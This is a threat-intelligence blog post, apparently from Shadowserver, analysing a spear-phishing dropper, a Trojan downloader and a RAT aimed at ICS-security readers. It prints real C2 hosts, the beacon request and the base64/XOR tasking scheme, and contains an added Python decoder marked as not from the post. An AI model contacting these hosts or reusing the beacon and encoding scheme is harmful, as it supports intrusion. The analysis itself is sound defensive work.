The following is a guest post courtesy of Ned Moran of the Shadowserver Foundation. This post is a technical analysis of the malware used in a spear phishing attack targeting those interested in ICS security.
Dale was kind enough to share a copy of the spear phishing email that he posted about here. This spear phish contained a link to a zip file hosted at hxxp://research.digitalvortex.com/. The downloaded zip file had the following properties:
File: Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.zip
Size: 1886505
MD5: 820B1CD69828983C089370BDC3CF5870
This archive contained an executable with the following properties:
File: Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf.exe
Size: 2192363
MD5: C6B95B178188B8C35D14BED40520E685
When executed in a lab environment this executable installed a Trojan downloader with the following properties:
File: spoolsvr.exe
Size: 73728
MD5: 5FF3269FACA4A67D1A4C537154AAAD4B
Path: C:\Documents and Settings\Administrator\Local Settings\Temp\spoolsvr.exe
As shown by this VirusTotal report, this downloader was only detected by 7 of 42 antivirus products. This downloader connects to a command and control server at hxxp://hint[.]happyforever[.]com via the following GET request:
GET /logo.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: hint.happyforever.com
Connection: Keep-Alive
The logo.html file contained encoded instructions and a payload. A snippet of the response is as follows:
<html><head>Ji01LC4tIyZ4eTEuJycyeHByeQ==</head><title>NiMsJSoubCc6Jw==</title><body>DxjSQkFCQkJGQkJCvb1CQvpCQkJCQkJCAkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
QkJCmkJCQkxd+ExC9kuPY/pDDo9jFiorMWIyMC0lMCMvYiEjLCwtNmIgJ2IwNyxiKyxiBg0RYi8t
JidsT09IZkJCQkJCQkK+wXCi+qAe8fqgHvH6oB7xebwQ8e+gHvHMhhTxlqAe8ZW/FfH4oB7xeahD
8f2gHvH6oB/xqaAe8cyGFfH0oB7xPaYY8fugHvEQKyEq+qAe8UJCQkJCQkJCEgdCQg5DRkKGWM8N
QkJCQkJCQkKiQk1DSUNEQkLCQ0JCUkNCQkJCQtSoQkJCUkJCQtJDQkJCAkJCUkJCQlJCQkZCQkJC
The above text can be decoded via the following two-step process. First, decode with the standard base64 alphabet and then apply a single byte XOR key of 0x42. The <head> tag will decode to:
<head>download:;sleep:20;</head>
These commands instruct the spoolsvr.exe downloader to retrieve and decode the secondary payload (an executable) contained in the <body> tag. The <title> tag will decode to:
<title>tanghl.exe</title>
This command instructs the spoolsvr.exe downloader to save the secondary payload decoded from the <body> tag onto the victim machine as tanghl.exe.
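To illustrate the two-step decoding described above on a captured logo.html response, here is an added Python example (not code from the post or from Shadowserver). It reuses the <head> and <title> strings printed in the post and only the first base64 line of the <body> blob; the key is a parameter so the same routine can be applied to the 0x6b-keyed RAT traffic, and the tag and command parsing is my own assumption about the page layout, not documented downloader behaviour.

```python
import base64
import re

# Single-byte XOR keys reported in the post: 0x42 for the downloader's
# logo.html tasking page, 0x6b for the tanghl.exe RAT's C2 traffic.
DOWNLOADER_KEY = 0x42
RAT_KEY = 0x6B

def decode_field(encoded: str, key: int = DOWNLOADER_KEY) -> bytes:
    """Reverse the encoding: base64-decode, then XOR every byte with key."""
    # The body blob is wrapped across lines; drop whitespace and repair the
    # padding so a wrapped or truncated capture still decodes.
    compact = re.sub(r"\s+", "", encoded)
    compact += "=" * (-len(compact) % 4)
    raw = base64.b64decode(compact)
    return bytes(b ^ key for b in raw)

def parse_tasking(html: str, key: int = DOWNLOADER_KEY) -> dict:
    """Extract and decode the <head>, <title> and <body> fields of the page."""
    fields = {}
    for tag in ("head", "title", "body"):
        m = re.search(rf"<{tag}>(.*?)</{tag}>", html, re.S)
        if m:
            fields[tag] = decode_field(m.group(1), key)
    return fields

def parse_commands(head: bytes) -> list:
    """Split 'download:;sleep:20;' into [('download', ''), ('sleep', '20')]."""
    cmds = []
    for item in head.decode("ascii", "replace").split(";"):
        if item:
            name, _, arg = item.partition(":")
            cmds.append((name, arg))
    return cmds

# Constructed sample: the <head> and <title> strings are the ones printed in
# the post; the <body> is only the first base64 line of the blob quoted there.
SAMPLE = ("<html><head>Ji01LC4tIyZ4eTEuJycyeHByeQ==</head>"
          "<title>NiMsJSoubCc6Jw==</title>"
          "<body>DxjSQkFCQkJGQkJCvb1CQvpCQkJCQkJCAkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
          "</body></html>")

if __name__ == "__main__":
    tasking = parse_tasking(SAMPLE)
    print(parse_commands(tasking["head"]))  # [('download', ''), ('sleep', '20')]
    print(tasking["title"].decode())        # tanghl.exe
    print(tasking["body"][:2])              # b'MZ', i.e. the payload is a PE file
```

The decoded <body> begins with a standard MZ/DOS header, which is how an analyst confirms the payload is an executable before carving it to disk for further analysis.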
The tanghl.exe file is a Remote Access Trojan that gives the attacker full control of the victim machine. This tanghl.exe file had the following properties:
File: tanghl.exe
Size: 167936
MD5: 9B6692295FADF24B512D5F63E4F74D15
Path: C:\Documents and Settings\Administrator\Local Settings\Temp\tanghl.exe
This RAT attempts to connect to another command and control server at 1.234.1.68 over port 80. Communications between the RAT and the control server are encoded via base64 and a single byte XOR key of 0x6b.
The above patterns of attack are very similar to attacks carried out by the actors responsible for the Shady RAT campaign documented by McAfee. Similarities include the use of encoded commands hidden in otherwise normal-looking webpages, as well as an overlap between the command and control infrastructure used in this attack and that of previous Shady RAT attacks.
Ned Moran is a member of the Shadowserver Foundation (www.shadowserver.org) where he spends his time researching targeted attacks. He can be reached at ned /at/ shadowserver /dot/ org.
Image by Razza Mathadsa